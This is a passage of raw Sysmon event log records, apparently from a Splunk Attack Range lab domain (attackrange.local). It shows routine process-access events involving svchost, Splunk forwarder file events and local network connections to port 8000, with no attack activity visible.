12:24:33.215{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291748Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:34.476{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC89FABBE22596E10EAF15400FEC2D1,SHA256=FF42D2E9D9E7A6A3EFC49E898DAD46FB97B07519E8F6E2E540CE969BB43D5518,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440625Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:30.678{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62416-false10.0.1.12-8000- 10341000x8000000000000000440624Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:34.216{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440623Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:34.216{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291749Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:35.509{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10CB9BF4A9430A333EB9D23906D9E25F,SHA256=EF48FE951805B88847513D11E97036E91E4DA940B6743C856565E29D45FC5F09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440628Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:35.217{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440627Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:35.217{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440626Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:35.045{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68429B8B4CAC55A67FC778853C8216AD,SHA256=E6737B4BD9BBB7DEEFF871EB909AE2371C1AD49896D68AAA9F994DB04A46A02F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291753Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:34.489{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50630-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291752Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:36.527{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2C8DB8A04127263D71237BBA49B028,SHA256=4F2DCC976C71958FE112920DB6A33DFE40C58585FC220D020FF76303A0D9EE2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440631Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:36.277{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF7304EC7480B3EAB0FE82C585DF552,SHA256=5F22079DEAAFCB8C7023AAC51531508EF59DD13AC1CC891582B6A319C50FB109,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291751Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:36.244{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15D012670AF72E4BBB5FBDD53C2765B4,SHA256=F1CD8249E7DC0C21ABB262CF6D7AF1B0B75C211EC60F29EDBC70D645B8DCCF6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291750Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:36.244{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F35D47A14A4537A16377FD84A5D9BEEB,SHA256=A23D3D18BFA3C0A2E8DC05598C79D272E8B467A9A7E224C880EE41FAAEAF95C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440630Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:36.218{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440629Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:36.218{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440634Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:37.304{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=857CF52C22F839419DC4052A46D8D036,SHA256=297BF0CC24B94EED3164029C09FDECC71754264068091D6CD95DA1B53819DB86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291754Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:37.529{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A88F5A24C6FFD6AB7C1C33A6705545,SHA256=CDC394CF718A85B945B9AEACE9A3BD1C90E0C80D23BF696D2A47132B0143FACE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440633Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:37.219{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440632Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:37.219{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291755Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:38.531{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505B598DDF51C0C01EF5080E06A2153C,SHA256=BDEB5DF36273DBC9EA1BC221EED99A64613DB79803B0DD666F7B7CA54ECA80D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440637Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:38.531{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=100D7AC36157A4165C862985F0E4A2D5,SHA256=B5D35CF3D78A733AD58CBBC09B60D93148FCDEB9783E8F08E3993A55700235A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440636Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:38.220{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440635Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:38.220{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440642Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:39.555{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E9A2A817D5261EE9084DFF2E519CFB7,SHA256=7B39068A210890B5A7C2EE0743FC0A394C18B74303BFC4205C04A8425FA9529F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291756Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:39.554{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C86E218E60AD046B56B535442D681B71,SHA256=88740034948652536943A797367C5CF6E52796EA00EC60E2468A739B0E8C5896,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440641Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:39.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440640Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:39.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440639Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:39.117{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF060478E500C337C8A1FC5AA7FC3180,SHA256=C735F31679F6FD714B8B6A2B0F1835F8C14BC4CE277E67CE942D72F3D6B88A31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440638Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:39.116{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BDECA734A15D242680B17D4E7B76E51,SHA256=45B98AA5B2EA17331BB11D79D838FAE945F611DA60C16C21BA7259F659CBEAF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440646Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:40.566{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435C134AFCE0E8AB4BD5CFA5BD3CCD59,SHA256=E28B785C07C81855555902EF5D180CD48666DD40B1DB635F371312F26BA15D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291757Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:40.557{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F579F25D9024D429CCDAA102BBB72176,SHA256=B0016715C7969A980B1F2D8FD0EBDE1E7FCE4D8434CAB36ADF49CDDCFF88E7FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440645Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:40.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440644Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:40.221{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440643Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:36.551{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62417-false10.0.1.12-8000- 23542300x8000000000000000440649Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:41.591{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8D1F51CCA87CFF517B23549C83F0B06,SHA256=2B7AC04F70D54CFC54DFAA6F8E35815FB33B0B4F6CD74B5030BF815F8553C518,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291799Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291798Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291797Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291796Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 